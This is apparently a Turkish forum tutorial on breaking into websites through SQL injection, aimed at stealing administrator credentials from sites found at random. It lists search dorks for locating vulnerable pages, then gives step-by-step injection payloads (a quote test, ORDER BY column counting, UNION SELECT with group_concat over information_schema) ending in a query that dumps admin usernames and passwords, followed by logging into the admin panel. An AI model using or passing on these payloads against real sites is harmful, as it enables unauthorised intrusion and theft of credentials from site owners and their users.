#SQL NEDİR#
Structured Query Language yani Yapılandırılmış Sorgu Dili olan SQL verileri yönetmek ve tasarlamak için kullanılan bir veritabanı yönetim sistemidir. SQL, kendisi bir programlama diliolmamasına rağmen birçok kişi tarafından programlama dili olarak bilinir. SQL herhangi bir veri tabanıortamında kullanılan bir alt dildir. SQL ile yalnızca veri tabanıüzerinde işlem yapılabilir. SQL'e özgü cümleler kullanarak veri tabanına kayıt eklenebilir, olan kayıtlar değiştirilebilir, silinebilir ve bu kayıtlardan listeler oluşturulabilir.
#Neden açık olur?#
bazı SQL dilinde yazılmış sitelerde hatalar yani açıklar oluşa bilir bunun nedeni web masterların yani siteyi yazanların kodda hata yapmış olmalarıdır...
#SQL AÇIKLI SİTELERİ HACKLEMENİN MANTIĞI NEDİR?#
arkadaslar sql açıklı sitelerde bütün bilgiler database ye saklanır.bizler bu açıklardan faydalanarak database ye girebilir ve admin in kullanıcı adı ve şifresini ele geçirebiliriz.
#SQL AÇIKLI SİTE BULMAK#
sql açıklı siteleri dork taratarak bulabiliriz
şimdi aşağıda vereceğim siteleri googlede araktark sql dilinde yazılım siteleri bulabilirsiniz
siteleri buldukta sonra URL nin sonuna
' ( tırnak ) işareti koyun eger site error veriyosa site açıklı demektir.
=DORKLAR=
wladmin/login.asp
news.php?id=
index.php=id=
news_details.php?id=
picture.php?id=
display.php?id=
item.php?id=
NOT=BUNLAR SADECE BİR KAÇIDIR DAHA FAZLA ÜRETİLEBİLİR.
#SQL AÇIKLI SİTELERİ HACKLEMEK#
1-şimdi dorkumuzu google,yahoo vb yerlede arattık
2-açığımız sitenin sonuna( ' )işareti koyduk
OR| ornek.com: The Best Search Links on the Net'
3-site error verdi
4- sitenin sonna order by komutunu yazarak kolon sayısını aldık
OR| ornek.com: The Best Search Links on the Netorder by 12
eğer error veriyorsa 12 değildir 12 den daha düşük bir şeydir o zaman 12 den aşşagıya inicez mesala sayfa 5 e gelince düzelsin diyelim o zaman kolon sayımız 5
5- kolon sayımız ı bulduk (5)
6- sitenin sonuna union select komutuyla yazma izinli sayıyı ögrenicez bunu yaparken = önune - işareti koyucaz
OR| ornek.com: The Best Search Links on the Netunion select 1,2,3,4,5
neden union select 1,2,3,4,5 yazdık?
çünkü kolon sayımız 5 çıktı mesala 6 çıksaydı
union select 1,2,3,4,5 ,6 yazıcaktık
7- yazam izinli sayı çıktı mesala 2 olsun
8-şimdi urlenin sonundaki 2 yi silip tabloları çekicez ve url nin sonuna kodumuzu yazıcaz
OR| ornek.com: The Best Search Links on the Netunion select 1,group_concat(table_name),3,4,5 from information_schema.tables where table_schema=database()
9- tablolar çıktı
10-burada adminle ilgili olanı bulucaz bu admin,admin,user,users,admingroup,administrator vb. seyler olabilir bizimkisi admin olsun
11-username ve password un saklı olduğu sayfayı açalım
OR|ornek.com: The Best Search Links on the Netunion select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_schema=database()
NOT=butun table ları column diye deiştirdik ama en sondaki aynı kaldı
12-kolonlar çıktı buda username ve passwodla ilgili,benzer olanları alıcaz bunlar username,password ve uname,pword gibi seyeler olabilir bizimkisi username,password olsun
13-sıra username passwordları çalmaya geldi bunun için şu kodu kullanıyoruz
OR|ornek.com: The Best Search Links on the Netunion select 1,group_concat(0x3a,username,0x3a,password),3,4,5 from admin
şimdi biz ne yaptık?
*kolon sayfasında username ve pasword çıkmıştı column_name bçlümüne bunları yazdık (0x3a,username,0x3a,password)
*from un sonuna admin yazdık bu da tablolada çıkan seydi yani kıosaca adminin username ve passwordu ne demiş olduk
14- havi j vb bir programla admin panelini buluyoruz , username ve passwordleri yazıyoruz işte paneldeyiz
